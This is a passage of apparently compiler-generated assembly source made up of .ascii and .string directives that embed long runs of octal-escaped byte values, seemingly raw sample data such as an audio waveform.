\"%&!\034$-/4;<?B:1,(\"\027\f\n\b\375\367\362\352\347\345\337\335\336\341\353\356\355\370\377\375\372\367\360\354\343\332\323\312\310\313\305\276\306\314\312\314\316\324\332\333\334\340\340\342\346\336\327\327\324\315\311\306\311\316\314\320\326\326\327\331\323\314\312\306\305\301\275\306\316\320\330\342\346\355\362\360\356\355\354\353\343\334\340\340\331\332\333\333\337\341\343\351\361\371\005\t\020 '&))'&\036\031\030\023\022\027\024\023\034 !$&,0.152481+-*% \036\"$\"'-.24.--*)%%,0/6=?BB?=71.%\035\037\032\020\r\013\005\002\377\374\374\371\375" .ascii "\372\370\374\367\357\354\350\347\345\337\337\341\340\344\352" .ascii "\351\356\370\373\377\004\n\023\030\032#,+./)\"\034\024\013\002" .ascii "\374\374\366\360\364\364\356\356\354\344\340\335\332\330\323" .ascii "\324\333\333\332\337\340\337\341\335\332\332\330\326\326\322" .ascii "\322\327\324\317\320\317\314\312\307\311\314\314\323\332\333" .ascii "\341\351\347\345\346\342\340\333\326\327\324\320\324\326\321" .ascii "\323\326\325\324\326\330\336\340\341\351\355\356\362\362\356" .ascii "\356\354\346\343\336\337\343\342\342\353\357\360\365\370\372" .ascii "\375\377\004\007\b\020\030\031\035%&%'&%$\"%&\"'+'&(&%$!%'(/" .ascii "45<@<;840'!!\035\027\033\033\031\034\037 \"$*..2:9:>=750+%\036" .ascii "\035\034\026\025\027\023\020\016\t\005\001\374\373\370\362\364" .ascii "\364\353\350\350\344\340\335\335\340\340\340\350\353\354\364" .ascii "\371\367\372\375\374\375\376\001\b\013\022\036$&-.)&\036\027" .ascii "\020\005\376\373\364\357\360\353\350\351\347" .string "\345\345\343\347\351\345\350\355\351\345\346\341\334\330\323\322\316\315\322\324\322\330\336\333\333\335\333\331\327\325\330\330\327\335\337\335\337\340\335\334\332\327\331\327\327\334\333\331\336\337\331\330\326\324\321\315\321\327\327\334\347\352\354\362\363\357\354\350\343\336\326\327\330\323\326\334\335\340\350\354\362\371\376\007\016\021\027\036\036 \"\037\034\032\030\030\026\024\032\035\032 %%%&%%$#)&)*%\017#M\0345+\002\"\301\360\0374-\006JHA\365\021\037\366\032\007@8#1K\022\0021\354\376\323-\030\305\027\340\311\321\021D-)\324\310\352\335\371\356\377\016\375\037\b\362\035\003\353\357'$48\020\034\004\001\377\013\002\005\334\345\355\327\364\305\320\361\006\370\003 \b\347\363\371\364\022\027+\021\017,,\033*39\025\"\033\022?'$\002\023\003\373\n\360\345\313\334\325\242\276\322\274\310\247\265\321\267\327\352\330\326\345\361\373\374\377\365\002\016\345\004" .string "\021\034\373\030\360\001\n\346\025\020\020\005\374\361\334\336\335\355\340\324\333\341\325\343\276\316\314\261\311\327\324\327\367\333\355\347\365\002\016\035\r1>L1'*<C#3$1.\032\036\023\033&\036\036\033\021\021\026\361\342" .string "\370\366\366\002\004\372\336\372\361\363\017\001\f\004\030\017\r\f" .string "\022\032 34\013%H!2N)>F,$\037\034\027\025\021\020\021\032\023\376\354\335\316\310\330\320\316\321\304\272\274\273\262\277\262\274\274\305\325\320\324\344\357\376\r\037!%.!C\037/]HRVQRH3*#\023\023\t\365\363\364\350\333\324\322\314\276\334\337\304\323\323\306\315\315\335\342\360\360\377\373" .string "\372\001\n\020- \022\0135\020)\030\031\021\007+\026\024\t\t\374" .string "\337\356\350\342\327\324\323\311\274\270\275\261\266\246\303\307\300\331\307\301\333\322\343\362\364\373\372\374\366\357\362\357\367\375\005\377\r%\022\024\n\025\030\r\034\033\003\022\017\017\025\022\033\022\032\024\023\367\376\r\005\001\022\037\025\b\004\b\341\365\370\353\367\372\r\026\021\024\r\016\b\030\035\023\036\t\027\r\f\013 \032\01708:&$ .*:C7?4-\034\030\013\r\371\366\363\001\365\346\345\301\334\271\305\316\315\314\305\311\277\303\277\306\306\324\336\333\341\352\344\344\356\b" .string "\03516'432/(:7H:J-.3.*\037\034\020\005\372\357\345\342\341\354\353\343\326\333\314\301\277\341\316\317\335\356\013\361\363\366\365\355\365\362\374\372\007\375" .string "\016\374\005\004\372\374\n\026\376\372\377\347\372\360\373\r\017 \022\r\007\363\366\373\372\374\374\375\370\354\345\334\326\317\323\337\344\323\311\323\301\316\305\303\275\316\311\300\320\273\307\301\310\316\334\351\364\374\006\r\025\027\022..8TMSLFL<:AC2069# \035\020\027\021\016" .string "\001\375\354\356\372\370\345\364\013\371\374\364\345\362\346\375\355\365\016\367\013\374\374" .string "\021\013\005\026\033 \034&\033% \035)%\035\036\026\030\376\n\030" .string "\t\024\030\002\f\002\372\375\370\377\371\367\003\373\363\354\346\336\331\325\340\335\335\330\323\336\306\335\345\327\334\350\343\356\337\331\346\341\366\360\004\007\t\030\023\024\021\025\023\030!%&0-\"!\033#\033!\026(.\025!\033!\005\003\013\374\367\362\373\352\340\350\350\340\346\361\356\353\346\345\336\341\350\353\364\347\362\376\364\360\332\325\332\323\334\335\327\347\333\322\320\323\337\331\323\327\333\326\332\327\333\331\346\356\366\373\004\007\375\367\001\005\364\t\013\024\023\027\032\024!##$$/.%,\033 !\026\024\023\017\f\005" .string "\372\357\362\364\370\370" .ascii "\371\356\360\363\366\372\364\377\013\r\027\025\003\006\t\364" .ascii "\004\n\n\003\375\005\004\005\004\001\001\004\007\013\t\b\n\t" .ascii "\017\036\030\0303/&-%\037$$(',/\030\"\037\020\b\005\n\377\370" .ascii "\370\357\351\342\326\323\314\312\311\311\312\300\273\276\270" .ascii "\310\322\330\333\334\345\364\343\341\357\364\007\004\021\016" .ascii "\036*-$\026\030 \035\025\031\025\024\020\016\016\013\b\n\006" .ascii "\f\b\002\b\005\374\r\020\023\r" .string "\020\037\016\013\020\027\001\n" .string "\b\022\r\017\004\007\376\006\367\374\375\372\376\366\371\364\357\355\355\346\346\345\333\333\331\321\325\313\301\321\321\312\325\316\321\331\317\316\316\332\331\347\362\341\346\351\361\350\353\355\351\361\362\366\363\367\373\373\375\005" .string "\b\t\n\023\027\021\032),45*%;35,7,6:)<,2!$%\037\032\031\030\r\021\f\b\005\003\375\374\372\364\355\346\351\356\350\346\360\357\350\355\366\357\365\363\366\373\375\n\b\f\007\f\376\005\f\003\377\376\004\376\007\377\375\376\372\371\370\365\362\357\354\356\355\352\363\364\362\356\374\371\357\375\362\364" .string "\003\013\025\017\023\025\025\025\030\021\032\"\027#*!))\"!\033\034\021\016\006\004\374\371\371\364\363\356\363\352\351\361\351\352\353\350\357\356\362\365\360\361\367\357\345\342\360\353\350\360\355\343\350\355\336\350\340\353\352\345\352\342\356\355\362\371\374\377\002\006\007\b\005\004\r\n\007\020\021\f\n\n\003\002\003\002\001\002" .string "\372\375\374\370\364\367\370\356\354\350\337\344\345\344\350\344\343\360\361\354\367\363\367\371\372\377\002\013\r\021\024\022\021\016\017\t\r\t\006\020\n\005\004\001\375\003\371\365\365\373\001\371\001\373\373\005\002\005\b\002\017\016\005\f\005\007\013\r\026\030\023\023\026\025\027\027\030\033\034\035\037'!(#!$\036\025\027\032\022\030\020\024\b\004\005\b\003\375\377\363\377\367\375\361\366\371\356\371\347\354\353\337\345\346\342\347\346\347\353\355\353\354\357\357\357\360\363\364\366\372\001\004\007\n\023\f\t\t\005\016\b\001\013\375\006\013\371\b\004\375\373\372\373\365\365\362\370\374\376\367\370\371\367\372\362\362\365\367\364\366\365\366\374\372\373\376" .string "\375" .string "\376\005\007\f\r\016\017\022\032\020\024\023\022\007\f\020\001\003\001\002\005\374\370\376\365\370\363\357\357\347\355\354\350\347\353\344\343\347\341\340\340\335\337\341\341\346\351\353\353\356\361\361\365\365\373\373\377\004\006\013\005\f\013\016\013\013\005\006" .string "" .string "\b\375\007\375" .string "\376" .string "" .string "\377\002" .string "\n\005\002\024\023\n\021\023\022\022\022\b\017\016\f\021\016\020\021\022\f\016\r\013\013\013\r\017\020\026\027\031\032\034\036\032\034\032\033\030\025\024\031\020\023\026\016\021\t\t\013\372\373\372\366\363\356\360\352\350\346\354\347\344\340\336\335\336\350\341\346\353\354\362\366\367\370\373" .ascii "\003\b\013\016\024\025\026\027" .string "\027\024\023\020\016\t\t\n\t\004\003\375\376\373\370\375\357\357\363\364\357\356\364\362\353\360\361\364\364\355\370\354\352\361\352\367\362\361\371\365\371\367\366\372\367\370\377\375\002\004\b\377\007\001\002\372\374\365\367\364\352\336\350\024\006\353\320\n\005W17/\372@\026%\353\324\347\366\376\">/\004ZF\363\031\350\341\363\335\0030\312\273\306\315\007;/'7\377\002\320\335\357\373\"\032\002\360\370\323\317\302\333\315\320\311\305\263\271\331\262\304\327\346\317\341\327\313\343\336\275\276\272\236\300\250\264\331\335\351\334\352\374\350\334\326\322\356\364\356\362\335\374\r\023$/AAFAGPSUI)-*\377\356\354\366\007\032\032!9+'\033\036>HD*\030&\037\n\t\356\372\377\356\352\352\353\364\377\364\374\023\036\005\372\366\371\371\343\326\317\314\324\323\307\322\355\347\354\361\354\021\023\005\002\365\001\003\362\354\354\006\003\365\375\0269MKDCIH:,\032\036\023" .string "\371\377\006\013\373\003\030'<:/\024\031\031\t\r\025!#\021\013\t\025\016\364\366\372\b\030\f\021!#'\036\032-=+\020\003\377\356\355\330\306\320\333\344\325\326\345\357\344\330\321\311\314\312\265\262\267\271\275\251\257\310\326\336\325\332\355\356\366\353\337\356\350\332\322\310\316\337\336\326\340\365\004\f\020\026,2(\030\006\020\036\021\006\021\025\030\027\375\365\002\007\t\007\f\"+*\"$9A9*\037!\037\013" .string "\376\003\t\001\356\346\362\360\345\336\346\364\371\356\341\330\334\337\332\330\341\366\370\367\355\360\002\003\370\361\351\356\360\332\321\312\331\344\334\333\350\371\b\006\004\024\034\034\024\n\b\025\030\007\376\001\n\016\006\007\025%/0.9OQE>?FJ@?FLG5/4>>0).21\037\021\031\034\030\b\002\006\005\370\333\313\320\341\355\354\362\006\026\022\007\001\375\002\367\342\333\334\344\344\333\335\362\b\025\026\035++\037\b\371\366\360\341\315\302\307\313\304\272\273\313\327\325\317\325\342\355\355\337\330\335\337\323\302\300\304\312\306\277\312\335\354\361\355\362" .string "\n\005\371\367\001\002\367\353\353\367" .string "\376\372\377\t\020\017\t\017$/( \034\036\025\377\353\343\351\355\351\344\361\f\034!(5KO?2)'\033\006\356\343\347\340\320\311\317\340\360\360\364\005\024\030\017\004\003\t\007\367\347\344\354\352\336\331\344\363\373\367\363\373\t\t\376\366\365\376\373\350\340\346\357\361\347\346\360\376\005\002\002\017\036\036\022\t\020\024\r\374\364\371\001\002\375\376\013 &$+>RVMGHG9#\026\025\027\021\002" .ascii "\013\031\034\027\035.95'\032\022\006\357\330\321" .string "\332\347\353\350\362\b\031\034\033!.73&!&+#\025\027&0,!\037&'\036\021\016\026\031\r\372\362\364\357\337\313\303\310\311\277\271\277\315\331\327\322\327\345\351\336\316\311\317\314\275\261\260\266\273\264\255\264\305\317\317\314\326\350\356\347\336\337\347\344\323\304\300\307\311\305\302\316\345\360\354\350\357\372\371\353\341\342\352\354\344\337\350\374\005\003\005\021\"' \034#,)\032\r\n\017\b\370\361\367\005\n\004\007\027*325BONA78<4!\026\034 \036\023\022\036,0,,6C@0),, \f\001\004\007\002\370\367\003\022\023\f\017\032\"\035\016\007\f\016\003\364\356\363\373\372\365\372\013\030\030\016\r\026\027\f\374\363\362\357\340\316\307\313\317\314\303\310\330\336\330\316\311\316\320\312\303\306\321\330\325\316\320\335\345\344\342\353\374\t\f\020\033,8;8<DA3\"\032\031\026\013\003\006\016\025\022\016\022\033\034\023\n\b\r\013" .string "\370\371\375\376\370\364\371\002\007\006\004\n\025\031\021\013\013\f\006\372\357\355\361\357\353\351\360\375\003\001\002\007\f\013\001\372\371\372\366\354\344\343\346\342\330\323\326\334\337\333\335\347\361\364\363\362\367\373\366\353\343\341\340\333\321\316\323\327\327\324\325\334\344\345\343\344\350\356\355\346\344\352\356\355\353\355\364\373\375\375" .string "\007\017\017\t\007\t\t\002\372\365\370\373\370\366\372\003\013\017\020\023\033 \035\027\024\027\025\r\006\004\005\007\006\003\006\017\026\033\034\",2112585/--+' \036\"# \035\035 !\034\027\025\025\022\f\003\374\371\361\346\336\336\344\353\357\365" .ascii "\013\023\026\027\030\035\034\027\022\022\026\031\031\035'1:?" .ascii "ADFC:0(#\032\016\004\377\374\367\360\354\354\357\360\360\360" .ascii "\363\370\371\364\357\357\353\345\335\326\323\322\317\316\315" .ascii "\320\327\333\332\333\337\341\341\335\332\332\331\325\321\316" .ascii "\314\315\314\310\306\310\314\317\320\323\332\336\337\335\332" .ascii "\330\325\317\307\301\277\300\300\277\304\316\327\335\343\351" .ascii "\356\362\362\355\352\347\343\337\327\322\323\322\321\323\330" .ascii "\337\351\360\370\001\t\021\025\026\027\032\031\027\023\021\023" .ascii "\024\022\023\027\032 #$',.-,+,+(%%$%%#%*-./267521/,(\"!!!\"#" .ascii "&.36;@DFD@=71*\"\033\027\023\f\t\t\t\n\t\t\t\t\006\001\367\357" .ascii "\350\337\327\322\322\324\330\333\341\351\360\366\374\001\006" .ascii "\013\r\016\017\021\025\026\026\030\033\034\033\032\027\025\024" .ascii "\021\016\013\b\007\004\375\370\364\356\350\342\335\331\330\327" .ascii "\326\327\331\335\337\336\337\340\337\336\332\327\326\324\321" .string "\317\315\314\315\314\313\314\317\322\324\326\331\335\337\340\340\336\334\333\330\323\322\321\322\323\323\326\332\333\334\336\336\335\336\335\332\332\332\333\334\333\335\341\343\345\346\350\352\354\355\355\357\357\360\360\356\355\356\356\356\357\361\366\372\377\005\n\020\027\035 $())*)*)'&%$&%$&(*+,/12210/.+('&&%$&(((*++++*+***)*,+,-...-,+(&\"\035\030\025\017\t\004" .string "\377\374\370\366\365\361\356\352\344\341\340\336\334\335\337\342\344\345\351\355\357\364\367\371\376\003\007\f\021\027\035 \"%$\"\037\032\024\017\n\005\002\376\373\372\367\364\362\360\356\354\352\350\347\345\344\343\340\337\336\334\331\331\330\330\330\331\332\334\334\335\335\333\332\331\326\324\322\322\322\322\323\326\330\331\334\335\335\336\337\336\336\335\336\336\335\334\334\333\331\330\326\325\325\325\326\327\331\334\337\340\341\344\344\344\344\341\340\337\336\335\335\335\337\342\343\346\353\356\361\366\372\376\002\005\b\013\f\017\022\022\024\030\034 #'*,-..**&$\037\037\033\035\031\034\033\036\024\017\002\013\036" .string "\030\f\376\375\361\352,D\357\332(6\\:\bL\375%\036\343\345\366\352\366\374\304\006\310\307\002\027\003\304\331\336\336\334\355\346\334\334\312\310\272\304\372\336\335\326\3711?>\037A!7R@/\017\365" .string "\017\001\312\345\351\325\364\247\275\247\245\314\312\327\333\321\322\357\321\330\322\334\005\361\n\365\372?:Q?D3HhR@\016\032 -%\347\326\355\357\004\337\335\027\374\375\375\335\356\332\331\344\335\316\323\372" .string "\346\343\343\3610\036\035)\026#F>E; \020!<=\031\360\n\005\034\021\f\022\f\034\n" .string "\f\024\341\013\f\337\366\347#\004\374\354\0021\004\026" .string "\0278F,8&\022\004%1\024\037\356\004\020@\"\363\020\037 \022\035\001\352\310\275\300\252\266\263\327\007\362\337\365\004\373\357\354\345\366\017\007\023\005\353\370\r&=!\375\022\0318\035\376\034\013\0206:\0207\f\0262\022&\007\032\020\t\371\372\361\362\342\320\314\303\347\303\341\275\224\267\252\325\335\272\253\310\327\373\362\360\365\354\017\375\033\032\027\364\363\027\f\371\365\017\032#\024\034/%\007\002\361\374\370\352\365\334\277\263\312\313\360\327\320\374\327\350\332\336\342\326\335\357\372\341\351\330\341\022\017\023477@90D721\025;;\017\030\001\363\373" .string "\030\023\374\347" .string "\003\036\026\361\006\337\354\025\017\351\363\337\313\373\374\367\346\370\007\r\021\031159.8N?F>#\034\r4:;%\t;DF*\034\030\013\r\017\021\375\372\335\360\363\357\353\340\337\365\t\334\356\330\267\262\253\271\305\271\301\327\316\331\331\346\373\002\370\350\005\017B5$4+SEYS?('16\032\004\020\027\032\n\025\017\025\004\t\370\374\366\317\325\324\313\306\307\267\302\245\232\246\273\322\275\275\301\307\323\347\356\353\345\345\363\027\033\n" .string "\003*\037-,\036\025\017\032\365\037\003\346\002\356\371\350\361\363\355\327\310\327\333\357\343\334\342\344\356\354\362\355\346\344\321\002\363\333\351\305\355\356\357\365\355\372\361\376\007\027\024\f\017\023\025\b\013\031\"\017\373\374\0362 \021\037\"\0305),.\025&=>.\036\024.)'\035\025\002\374\372\367\375\356\337\330\347\320\334\340\337\352\357\364\373\024 !\020\r\036\036%#&\036\035(>B$!\024=/$3)%1?*6\034\n\023\f\006\362\327\306\300\261\254\270\306\325\315\310\326\342\361\353\353\345\353\366\365\n%\030\371\007%9,*\033\031\021\004\b\002\366\345\353\350\366\360\357\357\373\362\370\025\024\025 \023\002\031\004\016\027\t\362\335\354\367\371\352\340\336\375\b\005\002\365\365\364\372\367\356\341\324\322\305\316\321\274\260\276\271\251\261\306\301\270\305\277\323\332\351\341\344\342\335\353" .string "\006\374\372\373\035%1'\"\027\025\027\026\021\367\355\343\355\370\355\361\363" .string "" .string "\002\032\"!\037 \037&\035 \020\n\002\366\371" .string "\377\361\356\353\001\023\036\026\006\005\024\037\033\032\021\353\353\376\362\373\363\335\345\360\366\367\003\016\b\n\024$+.1-45@CKK39DMRD;A0?5+\024\363\370\375\004\374\347\343\361\360\374\370\002\373\374\354\344\344\315\303\251\265\256\263\266\310\312\277\333\324\362\006\005\001\366\007\020\025\030\037\022\013\020\027\037\032\f\t\016\f\013\007\017\r\r\t\016\032\032\025\022\032\021\024\033#\"\021\034\023\031\026\023\377\362\364\351\357\344\347\317\310\313\322\326\322\304\311\326\326\335\335\350\352\337\327\341\340\337\316\275\314\321\311\311\324\326\332\333\327\363\343\354\353\342\362\350\362\361\364\346\347\346\363\375\373\347\354\364\377\t\370\004\366\371\375\001" .string "\024\f\007\036\034\035\030+37,!46,))!\033\030\017\013\373\362\363\372\001\374\362\365\006\t\025\016\006\t\002\020\024\005\013\372\353\013\367\375\370\370\013\001\n\376\022\032!\036\036\"*( %\026\022\022\035!\"\024\033\036)3 !(*\"&!\034$\023\027'\r\017\024\023\025\004\376\005\366\347\336\322\327\335\337\335\340\331\325\327\345\354\355\343\355\373\003\021\f\025\026\032\033\037\033\023\r\002\003\366\362\366\362\353\367\363\365\376\002\001\376\371\364\376\355\353\355\346\334\327\337\344\341\317\327\335\346\357\346\354\363\374\374\b\006\371\375\375\f\t\001\t\021\024\022\007\006\t\002\b\007\375\371\366\351\347\346\336\327\325\327\325\326\313\323\326\342\345\336\345\345\352\346\357\357\345\337\324\336\335\317\321\315\327\341\334\327\350\354\361\375\363\374\007" .string "\001\b\376\362\367\361\377\002\362\002\377\016\023\023\031\033\037!*(+$$192,0;E:39C:47'+\033\035%\025\006\021\020\r#\t\020\034)*\035&#'()$\036\023\016\025\022\n\004\001\004\020\004\376\005\006" .string "\373\375\361\357\352\337\325\317\275\264\265\263\264\255\266\275\307\322\324\330\340\357\367\374\376\001\377\375\027\036\033!(4><=<:7/)\"\033\013\f\006\005\377\367\372\376\005\370" .string "\003\020\020\006\013\n\f\b\377\361\375\360\337\357\360\361\357\354\365\373\376\001" .string "\377\371\374\366\364\360\342\346\341\334\326\313\314\321\323\312\316\317\331\340\330\333\336\333\326\332\326\324\315\316\330\336\336\331\327\343\363\354\356\363\364\355\356\346\340\345\323\330\337\330\330\316\331\353\357\362\374\003\021\034\030\033\037\037\037\"\036 \030\027\037&')-,@?8>@9<58.\034\"\033$\023\005\n\022\034\032\021\022 \035 \033\032\026\025\027\022\027\017\022\025\032\031\026\031 ,&&!!\034\027\017\n\001\357\357\345\350\342\341\331\350\351\341\347\345\360\343\351\333\326\327\310\306\305\301\303\304\312\333\343\353\350\374\t\007\016\023\032\030\030\030\037 \026\031\034\037\034\027\025\035!\032\031\027\033\033\026\024\022\017\r\n\b\006" .string "\376\007\017\n\r\n\r\022\n\013\b\n\004\375\357\356\360\345\345\344\352\341\342\343\346\355\352\355\357\361\367\363\361\355\345\346\340\342\343\331\327\336\351\350\351\350\354\367\361\360\353\352\344\343\337\334\331\312\315\316\320\320\315\303\316\324\322\326\323\326\334\334\341\341\331\340\347\354\362\360\357\377\r\022\032\020\027%%$\036\"\036\034\032\036\026\020\016\021\027\031\024\024 $(\037&\034;T=" .ascii "-H\034\003\353\361\301\033 \016<-\"JC)P \022#e\037\365%\302\366" .ascii "\372\305\025\373\351\335\333 EWe4#=\006\367\341\341\351\364\360" .ascii "\330\343\372\373\366\360\342\351\332\356" .ascii "\332\313\311\331\333\275\277\264\271\302\270\260\307\335\335" .ascii "\333\366\373\004\036\n\013\023\f\007\367\357\003\360\360\374" .ascii "\355\377\024(\025\016%11#,1%,\034\376\001\b\365\356\367\004\032" .ascii "\027\033\023\035+1\"!0\022\027\374\354\r\377\362\357\345\006" .ascii "\013\376\371\370\t\016\r\373\363\362\357\331\275\300\273\273" .ascii "\266\257\252\265\305\302\312\277\312\324\327\321\320\330\315" .ascii "\307\265\262\310\301" .string "\274\306\273\344\367\341\364\373\006#\027\016\026 \033\017\006\003\024\023\020\024\025'/'2<IUPKOSO8'&57'&\037:E5<;KU:,7/ \016\372\374\371\372\345\345\355\353\363\356\372\001\013\023\t\374\005\007\365\342\325\321\330\342\316\313\327\351\366\347\354\366\b\n\362\354\357\350\341\320\275\310\302\270\257\261\274\306\321\321\340\374\016\017\f\013\033\033\036\025\003\025!*$(9HRLR]d^NFH@4!\017\034\024\002\375\374\n\r\005\377\t\032!\031\t\377\003\376\360\337\321\331\327\323\316\312\324\346\352\337\343\364\371\363\351\337\346\340\320\277\270\302\274\255\251\261\302\314\302\303\323\344\356\350\337\333\345\343\327\317\307\316\322\317\312\323\344\362\366\370\003\017\031\022\n\006\016\n\367\354\355\374\372\356\350\370\017\034\027\031-@K<:>B=.$!)& +3<?>EMLB526%\020\002" .string "\004\376\353\336\355\373" .string "\365\363\002\017\022" .string "\374\377\377\367\343\334\337\341\335\330\334\352\365\370\372" .string "\017\024\016\005" .string "\001\004\370\342\327\330\341\330\311\302\322\342\347\340\336\361\374\372\353\351\354\356\343\321\317\331\334\330\332\344\374\n\r\025#7A>8;BH=,&*/(\034\025'24.,>E>/-.,\032\005\003\b\003\366\362\367\t\r\005\005\016\033\034\016\001\002\001\375\353\331\320\320\321\307\276\273\313\324\323\323\325\346\353\345\333\334\341\334\314\274\301\307\304\272\270\305\333\337\327\334\351\371\373\354\343\347\350\343\322\303\303\304\303\273\271\274\313\325\325\334\343\365\377\371\366" .string "\007\003\370\356\371\005\004\374" .string "\024,1+3DTUICLLD5&)'#\032\030\035(-(08CD;59:+\033\r\023\030\017" .ascii "\002\022%$\031\037.;5& %!\024\003\366\371\364\353\341\343\352" .ascii "\357\360\355\367\377\005\001\367\363\366\365\342\321\305\313" .ascii "\316\302\265\267\305\323\321\305\315\335\350\341\327\323\337" .ascii "\336\317\310\303\315\312\304\304\317\337\350\356\363\006\027" .ascii "! \034\037('\026\n\004\f\020\007\375\005\026$#\034'7=4*(.'\022" .ascii "\007\002\006\375\360\354\366\001\002\002\004\026\"%\036\031\034" .ascii " \034\t\375\372\001\003\371\361\372\t\024\023\016\033*-!\032" .ascii "\031\035\023\373\363\356\360\344\322\317\332\343\337\333\335" .ascii "\356\371\365\352\345\351\352\341\314\302\300\304\303\273\267" .ascii "\303\324\335\340\340\361\001\004\374\372\377\002\372\346\343" .ascii "\346\351\336\323\326\347\363\356\357\367\f\026\022\013\n\020" .ascii "\020\007\366\362\363\364\363\356\356\372\006\f\020\023!))! \"" .ascii " \026\003\002\004\004\371\356\364\004\016\t\f\025)3-(+0-%\027" .ascii "\024\025\024\022\020\020\032#%*+47" .string "2)&$\033\f\370\364\362\354\336\323\330\346\355\347\353\365\007\016\n\t\r\023\021\n\003\005\007\007\b\013\021\032#%-1894.,(\037\021\377\375\373\364\346\335\341\353\357\346\350\356\372\373\362\355\356\355\344\333\322\321\317\313\311\315\322\330\335\341\352\356\365\365\362\357\360\356\345\334\317\321\321\315\304\301\311\324\332\326\333\345\361\362\354\353\355\354\345\336\330\331\325\321\322\327\334\342\345\351\363\367\374\374\372\371\372\371\362\353\342\347\351\350\344\345\360\376\006\005\017\032'+(*//)%#&$!#+047;EHIEC@?9/'\034\034\032\025\016\f\021\030\034\031\035#*)$#$\037\027\022\017\020\013\007\b\021\024\027\030\033%''# \034\032\023\b\001\365\364\360\351\342\336\340\345\345\337\341\343\345\341\332\327\326\317\306\302\301\302\277\275\303\317\325\332\337\350\366\373\377\377\002\003\006\002\375\373\364\366\365\364\360\360\365\373\376\374" .string "\004\b\006\002" .string "" .string "\370\361\357\355\355\346\344\347\361\362\364\364\371\004\004\003" .string "" .string "\375\375\366\360\354\345\346\345\344\342\342\347\360\364\364\372\377\003\004\003\003\004\377\373\373\374\375\371\370\376\b\n\013\f\021\032\030\026\022\020\f\t\001\373\365\355\355\352\351\346\346\352\361\364\365\373\377\004\005\006\b\013\006\006\b\f\017\r\017\027#%)+3<;:8953+&!\031\030\026\024\021\020\021\027\027\027\031\032\032\031\026\023\021\b\005\004\004\003\376\375\003\013\013\f\f\022\027\025\023\017\016\t\007" .string "\375\367\360\360\357\356\354\353\355\363\364\364\366\366\367\365\362\360\354\343\340\334\334\330\322\317\324\331\325\325\323\331\334\332\330\326\326\324\324\317\321\317\315\321\325\332\335\341\350\364\371\377\004\t\r\017\017\020\017\t\t\t\f\n\006\007\016\023\022\024\021\030\032\026\023\017\f\007\003\374\373\364\357\357\360\360\357\356\362\371\372\375\376" .string "\002\003\001\002" .string "\373\374\374" .string "\376\375\376\007\r\016\020\020\030\031\030\026\025\023\017\013\007\006\377\373\372\373\372\371\366\371\375\375\376\374\374\374\373\367\370\363\356\356\356\362\360\357\363\376\003\006\t\f\025\027\031\031\032\031\031\027\026\027\023\021\023\026\030\030\027\035!##$%%$!!\033\026\025\025\027\023\020\021\030\031\031\027\030\034\031\026\022\020\013\007\002\001\376\367\364\365\367\367\366\364\372\375\377" .string "\377" .string "" .string "\377\375\377\370\366\365\367\370\366\363\366\374\374\375\371\371\372\367\362\355\350\341\334\324\321\314\304\300\301\301\302\300\300\307\313\317\321\325\330\335\337\343\350\346\352\355\365\371\374\376\005\017\022\026\024\031\034\033\031\027\023\017\013\007\006\001\374\370\372\372\373\367\366\372\373\374\372\373\371\372\367\370\367\362\362\361\365\367\366\365\373\001\003\004\003\006\b\006\005\002\001\374\372\366\370\362\357\352\356\361\367\364\372\377\004\b\007\013\t\017\004\f\366\017" .string "\361\373\367\333\b\"\363\002\024_,\0160(\3531\034\254\003\004\320\352\352\004\037\264 &\263\356\023\023\332\303\250\304\375\370\254\272\367\341\305\313\333\364\372\346\372\r0\030\027\036NeCSTL7\035\362\004\371\347\327\352\363\334\325\250\351\300\243\264\255\327\270\250\277\306\265\277\271\350\020\002\0373<>66ZiSB+I9\016\035\037\024\337\335\346\332\342\311\315\312\355\346\320\332\355\376\323\366\373" .string "\330\333\376\370\n\f\377\367\036\n" .string "\372\031!(\"\025/\r" .string "\017$:1 -:2,\026 ,\023\023\b\013\356\006\342\343\006\340\357\340\003\013\361\352\357\355\372\f\037/<..DWA\032\"/J\021\001 \020\005\002\326\356\003\366\363\355\355\304\261\265\330\310\331\351\330\346\374\366\326\361$\372\366\017\n\026\376\365\353\375\003\036\024,9&\036'\037\370\b\003\"\007\007\n\366\t\027\f\b!.&\023%#\004\002\337\334\340\324\267\263\353\334\321\265\323\302\274\310\260\305\302\312\271\307\334\350\343\353\023%\035\0273.\f\023\b\017' \022\b\024\036\377\356\375\342\337\333\324\311\313\267\247\337\350\343\372!\035\t\365\373\001\364\357\331\345\337\334\333\301\334\374\371\020(A72*!\027%5\027><G:@K)\036\033,\025\t\376\361\357\355\303\322\331\322\362\306\361\006\355\356\321\360\356\370\371\376(*\026\0314<>9Q@3-$!\003\"\037\376-<=KL2\037\025\004\r" .string "\004\355\357\365\375\356\346\016\024\373\366\017\b" .ascii "\346\274\254\256\311\264\266\343\342\335\327" .string "\363\362\352\353\363\363" .ascii "\f\365\t\0345!%OQX[K*<+ )#%\005\f\016\t\357\353\001\351\342\336" .ascii "\330\312\326\305\267\277\332\347\253\355\353\342\337\305\342" .ascii "\304\323\304\312\325\327\324\312\334\357\357\353\373\n\026\003" .ascii "\376\377\377\031\023\003$0-\037/=&\024\006\001\371\357\326\313" .ascii "\304\310\275\260\315\310\303\320\353\353\342\346\354\350\332" .ascii "\355\347\370\004\006\360\346\377\002\371\364\006\007\013\013" .ascii "\375\001\005\022\003\364\036$'! \034\023\001\020\034\030\035" .ascii "\017\030)4 2AA85" .string "6+!\030\374\377\016\007\374\t\r\363\353\353\362\342\360\353\367\353\360\352\335\356\374\013\003\027 + 0/.6528D@@395'\033#\032\f\376\006\001\377\377\361\007\006\361\340\352\352\343\327\333\322\311\316\325\311\327\333\306\312\325\373\337\333\364\017\003\373\"\035\035$\034\037)3+&0&\032\f\005\376\004\364\364\353\364\376\354\352\351\n\361\345\375\001\352\332\333\345\363\362\006\003\016\034\025\023\025\013\374\367\360\346\344\331\310\273\315\273\302\321\304\333\316\307\253\303\264\274\265\264\324\310\335\324\370\353\341\361\366\377\377\006\b\007\027\017\005\023(+ '+ \023\031\375\374\345\331\335\347\375\366\362\004\021\027\026\026.\034\025\023\t\002\001\367\370\004\023\027\020\013\021\b\372\013\374\377\370\366\376\002\r\371\352\017\024\017\023\033 \016\f\004\373\374\377\377\005\022\035\025\033!/&)*-;+:.<H?ZehXRM=\"\025\013\372" .string "\365\355\351\360\351\335\334\337\340\317\316\276\266\265\246\245\256\312\317\336\354\004\020" .string "\016\031\017\f\n\370\007\377" .string "\376\006\021\f\026\035($\031\027\n\004\370\374\370\361\t\f\020\r#\"\031\r#\020\032\032" .string 